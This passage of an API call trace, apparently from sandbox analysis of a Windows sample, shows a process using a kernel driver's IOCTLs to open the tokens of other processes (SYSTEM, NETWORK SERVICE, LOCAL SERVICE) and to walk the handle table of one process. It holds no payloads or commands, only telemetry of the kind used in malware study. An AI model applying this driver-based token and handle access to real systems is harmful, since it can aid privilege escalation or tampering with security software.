ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.482] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.484] CloseHandle (hObject=0xc0) returned 1 [0185.484] CloseHandle (hObject=0xc4) returned 1 [0185.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9c4) returned 0xc4 [0185.484] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.484] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002164b30, HandleInformation=0x0) returned 0x0 [0185.484] ObOpenObjectByPointer (in: Object=0xfffffa8002164b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.484] ObfDereferenceObject (Object=0xfffffa8002164b30) returned 0x14 [0185.484] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.484] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.484] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.484] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.484] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.487] CloseHandle (hObject=0xc0) returned 1 [0185.487] CloseHandle (hObject=0xc4) returned 1 [0185.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc4 [0185.487] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.487] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8002089b30, HandleInformation=0x0) returned 0x0 [0185.487] ObOpenObjectByPointer (in: Object=0xfffffa8002089b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.487] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x3b [0185.487] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.487] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.487] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.487] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.487] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.489] CloseHandle (hObject=0xc0) returned 1 [0185.489] CloseHandle (hObject=0xc4) returned 1 [0185.489] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa1c) returned 0xc4 [0185.490] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.490] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80020d6060, HandleInformation=0x0) returned 0x0 [0185.490] ObOpenObjectByPointer (in: Object=0xfffffa80020d6060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.490] ObfDereferenceObject (Object=0xfffffa80020d6060) returned 0x3c [0185.490] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.490] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.490] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.490] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.490] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0185.492] CloseHandle (hObject=0xc0) returned 1 [0185.493] CloseHandle (hObject=0xc4) returned 1 [0185.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb40) returned 0xc4 [0185.493] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0185.493] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa800287e060, HandleInformation=0x0) returned 0x0 [0185.493] ObOpenObjectByPointer (in: Object=0xfffffa800287e060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000880) returned 0x0 [0185.493] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4d [0185.493] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000880, DesiredAccess=0x8, TokenHandle=0xfffffa80021185c0 | out: TokenHandle=0xfffffa80021185c0*=0xc0) returned 0x0 [0185.493] ZwClose (Handle=0xffffffff80000880) returned 0x0 [0185.493] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0185.493] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0185.493] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0186.203] CloseHandle (hObject=0xc0) returned 1 [0186.203] CloseHandle (hObject=0xc4) returned 1 [0186.203] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.203] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0xc0, lpOverlapped=0x0) returned 1 [0186.203] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.203] PsAcquireProcessExitSynchronization () returned 0x0 [0186.203] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.203] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a0014a2380, HandleInformation=0x0) returned 0x0 [0186.203] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.203] PsReleaseProcessExitSynchronization () returned 0x2 [0186.203] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.203] ObQueryNameString (in: Object=0xfffff8a0014a2380, ObjectNameInfo=0xfffffa800311f2c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800311f2c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.204] ObfDereferenceObject (Object=0xfffff8a0014a2380) returned 0x1 [0186.204] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.204] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.204] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x1e, lpOverlapped=0x0) returned 1 [0186.204] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.204] PsAcquireProcessExitSynchronization () returned 0x0 [0186.204] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.204] ObReferenceObjectByHandle (in: Handle=0x8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a000702850, HandleInformation=0x0) returned 0x0 [0186.204] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.204] PsReleaseProcessExitSynchronization () returned 0x2 [0186.204] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.204] ObQueryNameString (in: Object=0xfffff8a000702850, ObjectNameInfo=0xfffffa80031393c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa80031393c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.204] ObfDereferenceObject (Object=0xfffff8a000702850) returned 0xad [0186.204] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.204] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.204] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.204] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0186.205] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.205] PsAcquireProcessExitSynchronization () returned 0x0 [0186.205] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.205] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001e86f20, HandleInformation=0x0) returned 0x0 [0186.205] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.205] PsReleaseProcessExitSynchronization () returned 0x2 [0186.205] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.205] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800313b7c4, Length=0x800, ReturnLength=0xfffff88002aab508 | out: ObjectNameInfo=0xfffffa800313b7c4, ReturnLength=0xfffff88002aab508) returned 0x0 [0186.205] ObfDereferenceObject (Object=0xfffffa8001e86f20) returned 0x1 [0186.205] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.205] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.205] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.205] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0186.205] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.205] PsAcquireProcessExitSynchronization () returned 0x0 [0186.205] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.205] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a00116aad0, HandleInformation=0x0) returned 0x0 [0186.205] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.205] PsReleaseProcessExitSynchronization () returned 0x2 [0186.205] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.205] ObQueryNameString (in: Object=0xfffff8a00116aad0, ObjectNameInfo=0xfffffa8003143044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003143044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.205] ObfDereferenceObject (Object=0xfffff8a00116aad0) returned 0x1 [0186.206] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.206] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.206] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0186.206] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.206] PsAcquireProcessExitSynchronization () returned 0x0 [0186.206] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.206] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a001121940, HandleInformation=0x0) returned 0x0 [0186.206] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.206] PsReleaseProcessExitSynchronization () returned 0x2 [0186.206] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.206] ObQueryNameString (in: Object=0xfffff8a001121940, ObjectNameInfo=0xfffffa8003144044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003144044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.206] ObfDereferenceObject (Object=0xfffff8a001121940) returned 0x1 [0186.206] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.206] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.207] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.207] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.207] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.207] PsAcquireProcessExitSynchronization () returned 0x0 [0186.207] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.207] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80019ea660, HandleInformation=0x0) returned 0x0 [0186.207] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.207] PsReleaseProcessExitSynchronization () returned 0x2 [0186.207] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.207] ObQueryNameString (in: Object=0xfffffa80019ea660, ObjectNameInfo=0xfffffa8003145044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003145044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.207] ObfDereferenceObject (Object=0xfffffa80019ea660) returned 0x3 [0186.207] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.207] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.207] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.207] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.208] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.208] PsAcquireProcessExitSynchronization () returned 0x0 [0186.208] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.208] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800296b280, HandleInformation=0x0) returned 0x0 [0186.208] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.208] PsReleaseProcessExitSynchronization () returned 0x2 [0186.208] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.208] ObQueryNameString (in: Object=0xfffffa800296b280, ObjectNameInfo=0xfffffa8003146044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003146044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.208] ObfDereferenceObject (Object=0xfffffa800296b280) returned 0x1 [0186.208] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.208] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.208] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.208] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.208] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.208] PsAcquireProcessExitSynchronization () returned 0x0 [0186.209] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.209] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001fbf450, HandleInformation=0x0) returned 0x0 [0186.209] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.209] PsReleaseProcessExitSynchronization () returned 0x2 [0186.209] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.209] ObQueryNameString (in: Object=0xfffffa8001fbf450, ObjectNameInfo=0xfffffa800311f2c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800311f2c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.209] ObfDereferenceObject (Object=0xfffffa8001fbf450) returned 0x2 [0186.209] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.209] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.209] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.209] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0186.209] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.209] PsAcquireProcessExitSynchronization () returned 0x0 [0186.209] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.209] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003771f60, HandleInformation=0x0) returned 0x0 [0186.210] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.210] PsReleaseProcessExitSynchronization () returned 0x2 [0186.210] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.210] ObQueryNameString (in: Object=0xfffffa8003771f60, ObjectNameInfo=0xfffffa80031393c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa80031393c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.210] ObfDereferenceObject (Object=0xfffffa8003771f60) returned 0x15 [0186.210] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.210] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.210] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.210] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x1a, lpOverlapped=0x0) returned 1 [0186.210] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.210] PsAcquireProcessExitSynchronization () returned 0x0 [0186.210] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.210] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003771df0, HandleInformation=0x0) returned 0x0 [0186.210] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.211] PsReleaseProcessExitSynchronization () returned 0x2 [0186.211] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.211] ObQueryNameString (in: Object=0xfffffa8003771df0, ObjectNameInfo=0xfffffa800313b7c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800313b7c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.211] ObfDereferenceObject (Object=0xfffffa8003771df0) returned 0x42 [0186.211] IofCompleteRequest (Irp=0xfffffa80034bd890, 